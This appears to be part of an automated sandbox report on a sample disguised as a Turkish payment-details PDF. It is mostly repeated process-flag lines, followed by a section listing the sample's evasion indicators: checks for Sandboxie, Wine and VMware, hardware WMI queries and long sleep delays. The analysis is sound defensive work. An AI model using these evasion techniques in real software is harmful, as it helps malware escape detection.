                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U00d6DEME DETAYLARI_PDF.exe PID: 6816, type: MEMORYSTR
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe TID: 6808Thread sleep time: -45733s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 688Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2556Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 6500 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6908Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 1599 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe TID: 4104Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe TID: 6504Thread sleep count: 5241 > 30
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe TID: 6504Thread sleep count: 3509 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2633
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6500
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1599
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeWindow / User API: threadDelayed 5241
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeWindow / User API: threadDelayed 3509
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeThread delayed: delay time: 45733
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeThread delayed: delay time: 922337203685477
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
